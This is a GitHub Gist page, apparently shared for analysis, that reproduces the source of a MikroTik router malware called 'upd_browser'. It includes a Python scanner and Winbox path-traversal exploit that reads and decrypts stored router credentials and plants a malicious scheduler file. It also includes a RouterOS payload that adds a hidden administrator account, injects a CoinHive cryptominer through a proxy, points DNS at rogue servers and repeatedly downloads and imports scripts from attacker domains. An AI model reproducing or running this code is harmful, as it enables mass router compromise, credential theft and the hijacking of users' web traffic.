-
-
Save malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4 to your computer and use it in GitHub Desktop.
upd_browser - MikroTik malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy} | |
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy} | |
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy} | |
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy} | |
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat} | |
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat} | |
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat} | |
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter} | |
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter} | |
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter} | |
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 | |
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp} | |
/system scheduler remove [find name=Auto113] | |
/system scheduler remove [find name=upd111] | |
/system scheduler remove [find name=upd112] | |
/system scheduler remove [find name=upd113] | |
/system scheduler remove [find name=upd114] | |
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m | |
:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={} | |
/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112} | |
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113] | |
:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112} | |
:do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={} | |
:do {/import u113.rsc} on-error={} | |
:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113} | |
:do {/system scheduler add name="upd114" interval=12h on-event=( | |
":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}" | |
) policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113} | |
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113} | |
:do {/file remove autosupout.rif} on-error={} | |
:do {/file remove autosupout.old.rif} on-error={} | |
/ip service set api disabled=no port=8728 address="" | |
/ip service set ftp disabled=no port=21 address="" | |
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" } | |
/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}" | |
:do {/file print file=dircreate} on-error={:log info errorFilePrint} | |
:delay 5s | |
:do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\t | |
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave} | |
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy} | |
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2} | |
:do {/file remove "dircreate.txt"} on-error={} | |
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress} | |
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress} | |
/user remove [find name=ftu] | |
/user group remove [find name=ftpgroupe] | |
/ip service set ftp disabled=yes port=21 address="" | |
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet} | |
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess} | |
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess} | |
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns} | |
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer} | |
/system reboot |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Embedded file name: upd_browser.py | |
import threading, time, socket, random, ups, datetime, urllib, base58, pyautogui | |
thmax = 600 | |
def poc(ip, level): | |
level = int(level) | |
if level == 3: | |
return False | |
user_pass = ups.get_user_pass(ip) | |
if len(user_pass) != 0: | |
try: | |
fg = False | |
shed = bytearray([]) | |
shedidx = bytearray([]) | |
part = random.randint(0, 9) | |
newpass = '' | |
for i in xrange(0, 10): | |
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)] | |
for user_pass_one in user_pass: | |
if user_pass_one[1] == 'dircreate': | |
newpass = user_pass_one[2] | |
ups.log(ip + ':' + 'dircreate' + ':' + newpass) | |
strusr = ip + '- part ' + str(part) + '\r\n' | |
for user_pass_one in user_pass: | |
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n' | |
ups.log(strusr) | |
keybase58 = ups.decrypt_password('Admiral', newpass) | |
keybase58 = base58.b58encode(keybase58) | |
shed, shedidx = ups.make_sheduller(shed, shedidx, ups.get_script(ip, part, newpass, keybase58)) | |
for user_pass_one in user_pass: | |
if user_pass_one[0] == 'f': | |
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if not fg: | |
for user_pass_one in user_pass: | |
if user_pass_one[0] != 'f': | |
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
except: | |
ups.log('Error excep poc') | |
if fg: | |
ups.log(ip + ' - ok') | |
return True | |
else: | |
ups.log(ip + ' - bad, level=' + str(level)) | |
time.sleep(150) | |
return poc(ip, level + 1) | |
def ping(ip, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.settimeout(2) | |
try: | |
serror = s.connect_ex((ip, port)) | |
except: | |
serror = -1 | |
finally: | |
s.close() | |
return serror | |
def scan(): | |
while True: | |
random.seed() | |
ip2 = str(random.randint(0, 255)) | |
time.sleep(random.randint(0, random.randint(0, 50))) | |
ip1 = str(random.randint(0, 255)) | |
ip3b = random.randint(0, 255) | |
for ip3s in xrange(ip3b, ip3b + 20): | |
ip3 = ip3s | |
if ip3 > 255: | |
ip3 = ip3 - 256 | |
for ip4 in xrange(0, 256): | |
ip = str(ip1) + '.' + str(ip2) + '.' + str(ip3) + '.' + str(ip4) | |
serror = ping(ip, 8291) | |
if serror == 0: | |
serror = ping(ip, random.randint(56778, 56887)) | |
if serror != 0: | |
poc(ip, 0) | |
if __name__ == '__main__': | |
time.sleep(3) | |
pyautogui.alert(text='Update error code 80072EE2', title='Error', button='OK') | |
time.sleep(20) | |
urllib.urlopen(ups.viplogpoc).read() | |
ups.log('Start 0') | |
for i in xrange(thmax): | |
try: | |
p = threading.Thread(target=scan) | |
p.setDaemon(True) | |
p.start() | |
if i == thmax - 1: | |
ups.log('Start 550') | |
except: | |
ups.log('Exccept threading') | |
vnow = datetime.date(2012, 12, 12) | |
while True: | |
vold = vnow | |
vnow = datetime.datetime.now() | |
if (vold.year != vnow.year or vold.month != vnow.month or vold.day != vnow.day or vold.hour != vnow.hour) and vold.year != 2012: | |
urllib.urlopen(ups.viplogpoc).read() | |
time.sleep(1000) | |
ups.log('All END!!!') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Embedded file name: ups.py | |
import socket, sys, hashlib, random, base58 | |
part = 0 | |
keybase58 = '' | |
viplogpoc = 'http://iplogger.co/1DQrN6' | |
def get_script(vip, vpart, vnewpass, vkeybase58): | |
viplog = ('http://iplogger.co/1DErN6', | |
'http://iplogger.co/1DYrN6', | |
'http://iplogger.co/1DPrN6', | |
'http://iplogger.co/1DArN6', | |
'http://iplogger.co/1DSrN6', | |
'http://iplogger.co/1DDrN6', | |
'http://iplogger.co/1DFrN6', | |
'http://iplogger.co/1DGrN6', | |
'http://iplogger.co/1DHrN6', | |
'http://iplogger.co/1DJrN6') | |
viplogstart = 'http://iplogger.co/1DcrN6' | |
vchKey = ("'oiKAGEslcNfjfgxTMrxKGMJvh436ypIM'", | |
"'5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx'", | |
"'5ROof564mEBQsYzCqee0M2LplLBEApCv'", | |
"'qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO'", | |
"'ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK'", | |
"'ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf'", | |
"'joy1MQSiGgGHos78FarfEGIuM5Ig7l8h'", | |
"'ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs'", | |
"'jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF'", | |
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'", | |
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'") | |
mtscript = ':do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}' + '\r\n' + '/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141' + '\r\n' + ':do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}' + '\r\n' + '/system scheduler remove [find name=Auto113]' + '\r\n' + '/system scheduler remove [find name=upd111]' + '\r\n' + '/system scheduler remove [find name=upd112]' + '\r\n' + '/system scheduler remove [find name=upd113]' + '\r\n' + '/system scheduler remove [find name=upd114]' + '\r\n' + ':do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\\r\\n:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}\\r\\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\\r\\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/import u113.rsc} on-error={}\\r\\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="upd114" interval=12h on-event=(":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}' + '\r\n' + ':do {/file remove autosupout.rif} on-error={}' + '\r\n' + ':do {/file remove autosupout.old.rif} on-error={}' + '\r\n' + '/ip service set api disabled=no port=8728 address=""' + '\r\n' + '/ip service set ftp disabled=no port=21 address=""' + '\r\n' + ':if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }' + '\r\n' + '/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"' + '\r\n' + ':do {/file print file=dircreate} on-error={:log info errorFilePrint}' + '\r\n' + ':delay 5s' + '\r\n' + ':do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\tminer.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}' + '\r\n' + ':do {/file remove "dircreate.txt"} on-error={}' + '\r\n' + ':do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + ':do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + '/user remove [find name=ftu]' + '\r\n' + '/user group remove [find name=ftpgroupe]' + '\r\n' + '/ip service set ftp disabled=yes port=21 address=""' + '\r\n' + ':do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}' + '\r\n' + ':do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}' + '\r\n' + ':do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}' + '\r\n' + ':do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}' + '\r\n' + ':do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}' + '\r\n' + '/system reboot' | |
mt = mtscript.replace('{part}', str(vpart)) | |
mt = mt.replace('{iplog}', viplog[vpart]) | |
mt = mt.replace('{iplogstart}', viplogstart) | |
mt = mt.replace('{keybase58}', vkeybase58) | |
mt = mt.replace('{chKey}', vchKey[vpart]) | |
mt = mt.replace('{newpass}', vnewpass) | |
mt = mt.replace('{vip}', vip.split('.')[0] + '.' + vip.split('.')[1] + '.' + vip.split('.')[2] + '.0/24') | |
return mt | |
def log(s): | |
s = str(s) | |
try: | |
print s | |
except: | |
print 'error except log' | |
def decrypt_password(user, pass_enc): | |
key = hashlib.md5(user + '283i4jfkai3389').digest() | |
passw = '' | |
b1 = bytearray(pass_enc) | |
b2 = bytearray(key) | |
for i in range(0, len(b1)): | |
passw += chr(b1[i] ^ b2[i % len(key)]) | |
return passw.split('\x00')[0] | |
def extract_user_pass_from_entry(entry): | |
user_data = entry.split('\x01\x00\x00!')[1] | |
pass_data = entry.split('\x11\x00\x00!')[1] | |
user_len = ord(user_data[0]) | |
pass_len = ord(pass_data[0]) | |
username = user_data[1:1 + user_len] | |
password = pass_data[1:1 + pass_len] | |
return (username, password) | |
def get_pair(data): | |
user_list = [] | |
entries = data.split('M2')[1:] | |
for entry in entries: | |
try: | |
user, pass_encrypted = extract_user_pass_from_entry(entry) | |
if entry.find('\x02\x00\x00\t\x03') != -1: | |
frw = 'f' | |
else: | |
frw = 'x' | |
except: | |
continue | |
pass_plain = decrypt_password(user, pass_encrypted) | |
user = str(user) | |
user_list.append((frw, user, pass_plain)) | |
return user_list | |
def delete255(d): | |
d1 = '' | |
while len(d) > 0: | |
d = d[2:] | |
d1 = d1 + d[:255] | |
d = d[255:] | |
return d1 | |
def insert255(d): | |
if len(d) < 256: | |
d1 = bytearray([len(d), 1]) | |
else: | |
d1 = bytearray([255, 1]) | |
while len(d) > 0: | |
d1 = d1 + d[0:255] | |
d = d[255:] | |
if len(d) != 0: | |
if len(d) < 256: | |
d1 = d1 + bytearray([len(d), 255]) | |
else: | |
d1 = d1 + bytearray([255, 255]) | |
return d1 | |
def load_file(ip, namefile): | |
a1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x05\x07\x00\xff\t\x07\x01\x00\x00!' | |
a2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
b = ';\x01\x009M2\x05\x00\xff\x01\x06\x00\xff\t\x06\x01\x00\xfe\t5\x02\x00\x00\x08\x00\x80\x00\x00\x07\x00' + '\xff\t\x04\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
try: | |
s = socket.socket() | |
s.settimeout(10) | |
s.connect((ip, 8291)) | |
a = a1 + chr(len(namefile)) + namefile + a2 | |
a = chr(len(a) + 2) + '\x01\x00' + chr(len(a)) + a | |
s.send(bytearray(a)) | |
d = str(s.recv(1024)) | |
if len(d) < 38: | |
raise Exception('no answer') | |
if d[4] != 'M' or d[5] != '2': | |
raise Exception('Not M2') | |
b = b[:19] + d[38] + b[20:] | |
s.send(bytearray(b)) | |
d = str(s.recv(256 * 256)) | |
if len(d) < 6: | |
raise Exception('no answer') | |
if d[4] != 'M' or d[5] != '2': | |
raise Exception('Not M2') | |
d = delete255(d) | |
n = d.find('\x03\x00\x00') | |
if d[n + 3] == '1': | |
res = d[n + 5:] | |
elif d[n + 3] == '0': | |
res = d[n + 6:] | |
else: | |
res = '' | |
except: | |
res = '' | |
finally: | |
s.close() | |
return res | |
def get_user_pass(ip): | |
return get_pair(load_file(ip, '/////./..//////./..//////./../flash/rw/store/user.dat')) | |
def save_file(ip, user, password, namefile, data, fg_reboot): | |
pinit = [55, | |
1, | |
0, | |
53, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
1, | |
7, | |
0, | |
255, | |
9, | |
7, | |
1, | |
0, | |
0, | |
33, | |
4, | |
108, | |
105, | |
115, | |
116, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0] | |
psalt = [42, | |
1, | |
0, | |
40, | |
77, | |
50, | |
1, | |
0, | |
254, | |
9, | |
39, | |
7, | |
0, | |
255, | |
9, | |
5, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0, | |
46, | |
1, | |
0, | |
44, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
2, | |
7, | |
0, | |
255, | |
9, | |
4, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
13, | |
0, | |
0, | |
0, | |
4, | |
0, | |
0, | |
0] | |
ppass = [100, | |
1, | |
0, | |
98, | |
77, | |
50, | |
12, | |
0, | |
0, | |
0, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
3, | |
7, | |
0, | |
255, | |
9, | |
1, | |
10, | |
0, | |
0, | |
49, | |
17, | |
0, | |
19, | |
120, | |
15, | |
235, | |
246, | |
25, | |
15, | |
217, | |
0, | |
237, | |
39, | |
189, | |
25, | |
20, | |
243, | |
36, | |
9, | |
0, | |
0, | |
49, | |
16, | |
185, | |
185, | |
158, | |
154, | |
32, | |
172, | |
153, | |
96, | |
86, | |
163, | |
217, | |
155, | |
155, | |
201, | |
53, | |
22, | |
1, | |
0, | |
0, | |
33, | |
2, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
11, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
13, | |
0, | |
0, | |
0, | |
4, | |
0, | |
0, | |
0] | |
h1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x01\x07\x00\xff\t\x01\x01\x00\x00!' | |
h2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00' | |
fl1 = bytearray([77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
4, | |
0, | |
0, | |
1, | |
1, | |
0, | |
254, | |
9, | |
3, | |
6, | |
0, | |
255, | |
9, | |
12, | |
7, | |
0, | |
255, | |
9, | |
2, | |
3, | |
0, | |
0]) | |
fl2 = bytearray([2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
8, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
2, | |
0, | |
2, | |
0, | |
0, | |
0, | |
2, | |
0, | |
0, | |
0]) | |
rb = bytearray([42, | |
1, | |
0, | |
40, | |
77, | |
50, | |
5, | |
0, | |
255, | |
1, | |
6, | |
0, | |
255, | |
9, | |
13, | |
7, | |
0, | |
255, | |
9, | |
5, | |
2, | |
0, | |
255, | |
136, | |
2, | |
0, | |
0, | |
0, | |
0, | |
0, | |
8, | |
0, | |
0, | |
0, | |
1, | |
0, | |
255, | |
136, | |
1, | |
0, | |
24, | |
0, | |
0, | |
0]) | |
res = False | |
try: | |
s = socket.socket() | |
s.settimeout(10) | |
s.connect((ip, 8291)) | |
pinit = bytearray(pinit) | |
psalt = bytearray(psalt) | |
ppass = bytearray(ppass) | |
s.send(pinit) | |
del pinit | |
d = bytearray(s.recv(256 * 256)) | |
psalt[10] = d[38] | |
s.send(psalt) | |
del psalt | |
d = bytearray(s.recv(256 * 256)) | |
i = d.index(bytearray([9, | |
0, | |
0, | |
49, | |
16])) | |
salt = d[i + 5:i + 5 + 16] | |
hash = bytearray(hashlib.md5('\x00' + password + str(salt)).digest()) | |
i = ppass.index(bytearray([10, | |
0, | |
0, | |
49])) | |
ppass[i + 6:i + 6 + 16] = hash | |
i = ppass.index(bytearray([9, | |
0, | |
0, | |
49])) | |
ppass[i + 5:i + 5 + 16] = salt | |
i = ppass.index(bytearray([1, | |
0, | |
0, | |
33])) | |
ppass[i + 4] = len(user) | |
ppass = ppass[:i + 5] + bytearray(user) + ppass[i + 5:] | |
ppass[0] = 98 + len(user) | |
ppass[3] = 96 + len(user) | |
s.send(ppass) | |
del ppass | |
d = bytearray(s.recv(256 * 256)) | |
if d.find(bytearray([105, | |
110, | |
118, | |
97, | |
108])) != -1: | |
raise Exception('Invalid password') | |
h = h1 + chr(len(namefile)) + namefile + h2 | |
h = chr(len(h) + 2) + '\x01\x00' + chr(len(h)) + h | |
s.send(bytearray(h)) | |
del h1 | |
del h2 | |
del h | |
d = bytearray(s.recv(256 * 256)) | |
i = d.index(bytearray([1, | |
0, | |
254, | |
9])) | |
fl1[14] = d[i + 4] | |
if len(data) < 256: | |
fl = fl1 + bytearray([49, len(data)]) | |
else: | |
fl = fl1 + bytearray([48, len(data) % 256, len(data) // 256]) | |
fl = fl + bytearray(data) + fl2 | |
fl = bytearray([len(fl) // 256, len(fl) % 256]) + fl | |
fl = insert255(fl) | |
s.send(bytearray(fl)) | |
d = bytearray(s.recv(256 * 256)) | |
i = d.find(bytearray([8, | |
0, | |
255, | |
8])) | |
res = i == -1 | |
if fg_reboot: | |
s.send(rb) | |
d = bytearray(s.recv(256 * 256)) | |
except: | |
res = False | |
finally: | |
s.close() | |
return res | |
def make_sheduller(shed, shedidx, mtscript): | |
p1 = bytearray([77, | |
50, | |
10, | |
0, | |
254, | |
0, | |
46, | |
1, | |
0, | |
8, | |
255, | |
255, | |
255, | |
255, | |
49, | |
1, | |
0, | |
8, | |
224, | |
1, | |
0, | |
0, | |
109, | |
0, | |
0, | |
9, | |
0, | |
1, | |
0, | |
254, | |
9, | |
0, | |
113, | |
0, | |
0, | |
8, | |
240, | |
107, | |
1, | |
0, | |
103, | |
0, | |
0, | |
33, | |
5, | |
97, | |
100, | |
109, | |
105, | |
110, | |
9, | |
0, | |
254, | |
33, | |
0, | |
45, | |
1, | |
0]) | |
p2 = bytearray([102, | |
0, | |
0, | |
33, | |
5, | |
115, | |
104, | |
49, | |
49, | |
51]) | |
idx = bytearray([0, | |
0, | |
0, | |
0, | |
43, | |
1, | |
0, | |
0, | |
5, | |
0, | |
0, | |
0]) | |
shed = bytearray(shed) | |
shedidx = bytearray(shedidx) | |
try: | |
if len(mtscript) < 256: | |
p = p1 + bytearray([33, len(mtscript)]) + bytearray(mtscript) + p2 | |
else: | |
p = p1 + bytearray([32, len(mtscript) % 256, len(mtscript) // 256]) + bytearray(mtscript) + p2 | |
t1 = len(p) % 256 + 2 | |
t2 = len(p) // 256 | |
if t1 > 255: | |
t1 = t1 - 256 | |
t2 += 1 | |
p = bytearray([t1, t2]) + p | |
idx[4] = t1 | |
idx[5] = t2 | |
t2 = -1 | |
t1 = 0 | |
if len(shedidx) != 0: | |
while t1 < len(shedidx): | |
if shedidx[t1] > t2 and shedidx[t1] != 255: | |
t2 = shedidx[t1] | |
t1 += 12 | |
idx[0] = t2 + 1 | |
except: | |
p = bytearray([]) | |
idx = bytearray([]) | |
return (shed + p, shedidx + idx) | |
if __name__ == '__main__': | |
ip = '79.142.53.22' | |
user_pass = get_user_pass(ip) | |
if len(user_pass) != 0: | |
fg = False | |
shed = bytearray([]) | |
shedidx = bytearray([]) | |
part = random.randint(0, 9) | |
newpass = '' | |
for i in xrange(0, 10): | |
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)] | |
for user_pass_one in user_pass: | |
if user_pass_one[1] == 'dircreate': | |
newpass = user_pass_one[2] | |
log(ip + ':' + 'dircreate' + ':' + newpass) | |
strusr = ip + '- part ' + str(part) + '\r\n' | |
for user_pass_one in user_pass: | |
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n' | |
log(strusr) | |
keybase58 = decrypt_password('Admiral', newpass) | |
keybase58 = base58.b58encode(keybase58) | |
